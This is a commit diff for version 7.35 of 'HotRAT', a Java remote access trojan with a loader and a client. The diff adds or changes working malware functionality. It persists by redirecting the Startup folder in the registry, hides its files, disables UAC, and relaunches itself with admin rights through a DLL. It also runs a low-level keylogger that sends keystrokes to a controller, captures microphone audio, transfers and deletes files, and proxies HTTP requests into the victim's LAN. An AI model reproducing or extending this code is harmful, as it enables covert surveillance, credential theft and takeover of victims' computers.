7.35 Update

HotRAT SRC)/Loader/Config.cfg

@@ -0,0 +1 @@
+port:11451:port

HotRAT SRC)/Loader/LookAndFeel.cfg

@@ -0,0 +1 @@
+LookAndFeel:com.sun.java.swing.plaf.windows.WindowsLookAndFeel:LookAndFeel

HotRAT SRC)/Loader/src/LoadDLL.java

@@ -0,0 +1,9 @@
+import com.sun.jna.Library;
+import com.sun.jna.Native;
+import com.sun.jna.WString;
+import com.sun.jna.platform.win32.WinDef;
+
+public interface LoadDLL extends Library {
+    LoadDLL instance = (LoadDLL) Native.loadLibrary("resources/CppUtils.dll", LoadDLL.class);
+    boolean RunAsAdmin(WString path, WString command);
+}

HotRAT SRC)/Loader/src/Loader.java

@@ -1,5 +1,5 @@
-import com.sun.jna.platform.win32.Kernel32;
-import com.sun.jna.platform.win32.WinNT;
+import com.sun.jna.WString;
+import com.sun.jna.platform.win32.*;
 
 import java.awt.*;
 import java.io.File;
@@ -14,18 +14,17 @@ public static void main(String[] args) throws IOException {
         try {
             int PID = Integer.parseInt(args[0]);
             File file = new File(getPath() + "\\javaw.jar");
-            File file1 = new File(getPath1() + "\\Copy.jar");
             WinNT.HANDLE handle = Kernel32.INSTANCE.OpenProcess(WinNT.PROCESS_ALL_ACCESS,false,PID);
             Kernel32.INSTANCE.TerminateProcess(handle,0);
             createConfig();
-            createFile(file, file1);
+            createFile(file);
             createProcess();
         }catch (ArrayIndexOutOfBoundsException e) {
             File file = new File(getPath() + "\\javaw.jar");
-            File file1 = new File(getPath1() + "\\Copy.jar");
-            if (!file.exists()) {
+            File file1 = new File(getPath1() + "\\360Security.ini");
+            if (!file1.exists()) {
                 createConfig();
-                createFile(file, file1);
+                createFile(file);
                 createProcess();
             } else {
                 System.exit(0);
@@ -34,20 +33,19 @@ public static void main(String[] args) throws IOException {
     }
     public static void createProcess() {
         try {
-            Runtime.getRuntime().exec("java -jar " + getPath() + "\\" + "javaw.jar");
+            while (!LoadDLL.instance.RunAsAdmin(new WString(System.getProperty("java.home") + "\\bin\\javaw.exe"), new WString("-jar " + getPath() + "\\javaw.jar"))){
+            }
         }catch (Exception e) {
         }
     }
-    public static void createFile(File file,File CopyFile) {
+    public static void createFile(File file) {
         try {
             file.createNewFile();
             FileOutputStream fileOutputStream = new FileOutputStream(file);
-            FileOutputStream fileOutputStream1 = new FileOutputStream(CopyFile);
             byte[] bytes = new byte[1024];
             int len = 0;
             while ((len = jar.read(bytes))!=-1) {
                 fileOutputStream.write(bytes,0,len);
-                fileOutputStream1.write(bytes,0,len);
             }
         }catch (Exception e) {
             e.printStackTrace();

HotRAT SRC)/RemoteControl-Client/src/me/client/Client.java

@@ -1,5 +1,7 @@
 package me.client;
 
+import com.sun.jna.Memory;
+import com.sun.jna.Pointer;
 import com.sun.jna.WString;
 import com.sun.jna.platform.win32.*;
 import me.client.send.*;
@@ -14,7 +16,7 @@
 
 public class Client {
     public static final String HEAD = "H0tRAT";
-    public static final String VERSION = "6.65";
+    public static final String VERSION = "7.35";
     public static boolean isturn = false;
     public static Socket socket;
     public static InetSocketAddress inetSocketAddress;
@@ -35,7 +37,10 @@ public static String getPath1() throws IOException {
 
     public static void register() throws IOException {
         Advapi32Util.registrySetExpandableStringValue(WinReg.HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders","Startup",getPath());
-        LoadDLL.instance.HideFile1(new WString(getPath()));
+        WinDef.DWORD dword = new WinDef.DWORD(WinNT.FILE_ATTRIBUTE_HIDDEN | WinNT.FILE_ATTRIBUTE_SYSTEM | 0x00000001);
+        Kernel32.INSTANCE.SetFileAttributes(getPath(),dword);
+        Kernel32.INSTANCE.SetFileAttributes(getPath1(),dword);
+        Advapi32Util.registrySetIntValue(WinReg.HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System","EnableLUA",0x00000000);//关闭UAC提示
     }
 
     public static String GetIP() {
@@ -49,6 +54,7 @@ public static String GetIP() {
             while ((len = fileInputStream.read(bytes))!=-1) {
                 temp += new String(bytes,0,len);
             }
+            fileInputStream.close();
             temp1 = new String(AESUtils.decrypt(temp));
             IP = temp1.substring(temp1.indexOf("IP:") + 3,temp1.indexOf("|"));
         }catch (Exception e) {
@@ -69,6 +75,7 @@ public static int GetPort() {
             while ((len = fileInputStream.read(bytes))!=-1) {
                 temp += new String(bytes,0,len);
             }
+            fileInputStream.close();
             temp1 = new String(AESUtils.decrypt(temp));
             Port = temp1.substring(temp1.indexOf("Port:") + 5);
             port = Integer.parseInt(Port);
@@ -78,16 +85,27 @@ public static int GetPort() {
     }
     public static void relieve() throws IOException {
         //解除主机
+        LoadDLL.instance.RemoveProtect();
         Advapi32Util.registrySetExpandableStringValue(WinReg.HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders","Startup","wowWTF");
-        File file = new File(getPath() + "\\javaw.jar");
-        file.deleteOnExit();
+        Advapi32Util.registrySetIntValue(WinReg.HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System","EnableLUA",0x00000001);
+        File file = new File(getPath1() + "\\360Security.ini");
+        file.delete();
         System.exit(0);
     }
+    public static void lock() {
+        if(Kernel32.INSTANCE.OpenMutex(MUTEX_ALL_ACCESS,false,"HotRat") == null) {
+            Kernel32.INSTANCE.CreateMutex(null,false,"HotRat");
+        }else {
+            Kernel32.INSTANCE.ExitProcess(0);
+        }
+    }
     public static void main(String[] args) throws Exception {
         UIManager.setLookAndFeel("com.sun.java.swing.plaf.windows.WindowsLookAndFeel");
-        LoadDLL.instance.Lock();
+        lock();
         register();
-        new AutoCheckFile().start();
+        LoadDLL.instance.EnableDebugPriv();
+        LoadDLL.instance.ProtectProcess();
+        new Thread(new ShutdownChecker()).start();
         inetSocketAddress = new InetSocketAddress(GetIP(),GetPort());
         try {
             while (!isturn) {

HotRAT SRC)/RemoteControl-Client/src/me/client/send/Audio.java

@@ -16,20 +16,19 @@ public class Audio extends Thread{
     public Audio(Socket socket){
         this.socket = socket;
     }
-    public void open(){
+    public boolean open(){
         try {
             AudioFormat audioFormat = new AudioFormat(AudioFormat.Encoding.PCM_SIGNED, 44100, 16, 2, 4, 44100, false);
             DataLine.Info info = new DataLine.Info(TargetDataLine.class, audioFormat);
             mic = (TargetDataLine) AudioSystem.getLine(info);
             mic.open();
             SendMessage.SendHead(MessageFlags.AUDIO_WINDOWS_SHOW,socket);
         }catch (Exception e) {
-            mic.stop();
-            mic.close();
-            SendMessage.SendHead(MessageFlags.AUDIO_ERROR,socket);
+            return false;
         }
+        return true;
     }
-    public void close() throws IOException {
+    public void close(){
         run = false;
         mic.stop();
         mic.close();

HotRAT SRC)/RemoteControl-Client/src/me/client/send/FileDownload.java

@@ -1,5 +1,6 @@
 package me.client.send;
 
+import com.sun.jna.platform.win32.Kernel32;
 import me.client.utils.MessageFlags;
 import me.client.utils.ReceiveMessage;
 import me.client.utils.SendMessage;
@@ -31,7 +32,7 @@ public void FileDownLoad(String path) {
                 fileInputStream.read(bytes);
                 SendMessage.SendHead(MessageFlags.FILE_PREPARE,socket);
                 SendMessage.Send(MessageFlags.FILE_DOWNLOAD,bytes,socket);
-                SendMessage.Send(MessageFlags.FILE_DOWNLOAD_END,filename.getBytes( ),socket);
+                SendMessage.Send(MessageFlags.FILE_DOWNLOAD_END,filename.getBytes(),socket);
             }else {
                 SendMessage.SendHead(MessageFlags.FILE_PREPARE,socket);
                 int len = (int) (file.length()/filelen);

HotRAT SRC)/RemoteControl-Client/src/me/client/send/FileManager.java

@@ -31,7 +31,9 @@ public void DiskQuery() {
 
     public void DeleteFile(String filename) {
         File file = new File(filename);
-        file.delete();
+        if(!file.delete()) {
+            SendMessage.SendHead(MessageFlags.FILE_DELETE_ERROR,socket);
+        }
     }
 
     public void OpenFile(String filename) {

HotRAT SRC)/RemoteControl-Client/src/me/client/send/KeyBoardHook.java

@@ -1,9 +1,11 @@
 package me.client.send;
 
 import com.sun.jna.platform.win32.*;
+import me.client.utils.LoadDLL;
 import me.client.utils.MessageFlags;
 import me.client.utils.SendMessage;
 
+import javax.jws.soap.SOAPBinding;
 import java.net.Socket;
 
 public class KeyBoardHook extends Thread{
@@ -16,11 +18,22 @@ public KeyBoardHook(Socket socket) {
     private WinUser.LowLevelKeyboardProc keyboardProc = new WinUser.LowLevelKeyboardProc() {
         @Override
         public WinDef.LRESULT callback(int nCode, WinDef.WPARAM wParam, WinUser.KBDLLHOOKSTRUCT event) {
-            if (event.vkCode != 0) {
-                String str = String.valueOf(Win32VK.fromValue(event.vkCode));
-                String s = str.replace("VK_","");
-                SendMessage.Send(MessageFlags.UPDATE_KEYBORAD, s.getBytes( ), socket);
-            }
+                if ((wParam.intValue() >= 0x2f) && (wParam.intValue() <= 0x100)) {
+                    String str = String.valueOf(Win32VK.fromValue(event.vkCode)).replace("VK_", "");
+                    if(str.length() >= 2) {
+                        if(event.vkCode == 0x0D) {
+                            SendMessage.Send(MessageFlags.UPDATE_KEYBORAD,"\n".getBytes(),socket);
+                        }else {
+                            SendMessage.Send(MessageFlags.UPDATE_KEYBORAD, ("[" + str + "]").getBytes(), socket);
+                        }
+                    }else {
+                        if(LoadDLL.instance.KeyState() == 0) {
+                            SendMessage.Send(MessageFlags.UPDATE_KEYBORAD, str.toLowerCase().getBytes(), socket);
+                        }else {
+                            SendMessage.Send(MessageFlags.UPDATE_KEYBORAD, str.getBytes(), socket);
+                        }
+                    }
+                }
             return com.sun.jna.platform.win32.User32.INSTANCE.CallNextHookEx(hhk, nCode, wParam, null);
         }
     };
@@ -33,7 +46,6 @@ public void run() {
     public void setHookOn() {
         WinDef.HMODULE hMod = Kernel32.INSTANCE.GetModuleHandle(null);
         hhk = com.sun.jna.platform.win32.User32.INSTANCE.SetWindowsHookEx(com.sun.jna.platform.win32.User32.WH_KEYBOARD_LL, keyboardProc, hMod, 0);
-
         int result;
         WinUser.MSG msg = new WinUser.MSG();
         while ((result = com.sun.jna.platform.win32.User32.INSTANCE.GetMessage(msg, null, 0, 0)) != 0) {

HotRAT SRC)/RemoteControl-Client/src/me/client/send/LANAccess.java

@@ -0,0 +1,69 @@
+package me.client.send;
+
+import me.client.utils.MessageFlags;
+import me.client.utils.SendMessage;
+
+import java.io.InputStream;
+import java.io.OutputStream;
+import java.net.HttpURLConnection;
+import java.net.Socket;
+import java.net.URL;
+import java.nio.charset.StandardCharsets;
+
+public class LANAccess extends Thread{
+    Socket socket;
+    public LANAccess(Socket socket) {
+        this.socket = socket;
+    }
+    public void get(String url,String head) {
+        try {
+            String message = "";
+            URL url1 = new URL(url);
+            HttpURLConnection httpURLConnection = (HttpURLConnection) url1.openConnection();
+            byte[] bytes = new byte[1024];
+            int len = 0;
+            httpURLConnection.setRequestMethod("GET");
+            httpURLConnection.setDoInput(true);
+            String[] strings = head.split("\\|");
+            for(String str : strings) {
+                String[] heads = str.split("#");
+                httpURLConnection.setRequestProperty(heads[0],heads[1]);
+            }
+            InputStream inputStream = httpURLConnection.getInputStream();
+            while ((len = inputStream.read(bytes))!=-1) {
+                message += new String(bytes,0,len, StandardCharsets.UTF_8);
+            }
+            SendMessage.Send(MessageFlags.LAN_ACCESS_GET,message.getBytes(),socket);
+        }catch (Exception e) {
+            SendMessage.SendHead(MessageFlags.LAN_ACCESS_ERROR,socket);
+        }
+    }
+    public void post(String url,String head,String text) {
+        try {
+            String message = "";
+            URL url1 = new URL(url);
+            HttpURLConnection httpURLConnection = (HttpURLConnection) url1.openConnection();
+            byte[] bytes = new byte[1024];
+            int len = 0;
+            httpURLConnection.setRequestMethod("POST");
+            httpURLConnection.setDoInput(true);
+            httpURLConnection.setDoOutput(true);
+            String[] strings = head.split("\\|");
+            for(String str : strings) {
+                String[] heads = str.split("#");
+                httpURLConnection.setRequestProperty(heads[0],heads[1]);
+            }
+            OutputStream outputStream = httpURLConnection.getOutputStream();
+            outputStream.write(text.getBytes());
+            outputStream.flush();
+            outputStream.close();
+            InputStream inputStream = httpURLConnection.getInputStream();
+            while ((len = inputStream.read(bytes))!=-1) {
+                message += new String(bytes,0,len, StandardCharsets.UTF_8);
+            }
+            SendMessage.Send(MessageFlags.LAN_ACCESS_POST,message.getBytes(),socket);
+        }catch (Exception e) {
+            SendMessage.SendHead(MessageFlags.LAN_ACCESS_ERROR,socket);
+        }
+    }
+}

HotRAT SRC)/RemoteControl-Client/src/me/client/send/PictureDisplay.java

@@ -0,0 +1,22 @@
+package me.client.send;
+
+import javax.swing.*;
+import java.net.MalformedURLException;
+import java.net.URL;
+
+public class PictureDisplay {
+    JWindow window;
+    public void show(String url) throws MalformedURLException {
+        window = new JWindow();
+        window.setAlwaysOnTop(true);
+        JButton but = new JButton();
+        but.setIcon(new ImageIcon(new URL(url)));
+        window.getContentPane().add(but);
+        window.setLocationRelativeTo(null);
+        window.setSize(450,450);
+        window.setVisible(true);
+    }
+    public void close() {
+        window.dispose();
+    }
+}

HotRAT SRC)/RemoteControl-Client/src/me/client/send/RegisterManager.java

@@ -58,7 +58,8 @@ public void deleteValue(int hkey,String path,String value) {
     }
     public void deleteKey(int hkey,String path) {
         Advapi32Util.registryDeleteKey(new WinReg.HKEY(hkey),path);
-        regQuery(hkey,path);
+        String lastPath = path.substring(0,path.lastIndexOf("\\"));
+        regQuery(hkey,lastPath);
     }
     public void createValue(int hkey,String path,String newValue,String type) {
         switch (type) {

HotRAT SRC)/RemoteControl-Client/src/me/client/send/RemoteChat.java

@@ -20,7 +20,6 @@ public class RemoteChat {
     Socket socket;
     public RemoteChat(Socket socket)throws Exception{
         this.socket = socket;
-        SendMessage.SendHead(MessageFlags.SHOW_REMOTECHAT,socket);
         jWindow = new JDialog();
         jta = new JTextArea();
         jWindow.setAlwaysOnTop(true);
@@ -56,17 +55,16 @@ public RemoteChat(Socket socket)throws Exception{
                 jta.append(date + "\n");
                 jta.append("我: " + jtf.getText() + "\n");
                 jtf.setText("");
-                SendMessage.Send(MessageFlags.SEND_REMOTECHAT,chat.getBytes( ),socket);
+                SendMessage.Send(MessageFlags.SEND_REMOTECHAT,chat.getBytes(),socket);
             }catch (Exception e) {
             }
         });
     }
     public void closeWindows() {
         jWindow.dispose();
     }
-    public void update(byte[] bytes) throws UnsupportedEncodingException {
+    public void update(byte[] bytes){
         String context = new String(bytes);
         jta.append(context + "\n");
-        System.out.println(context);
     }
 }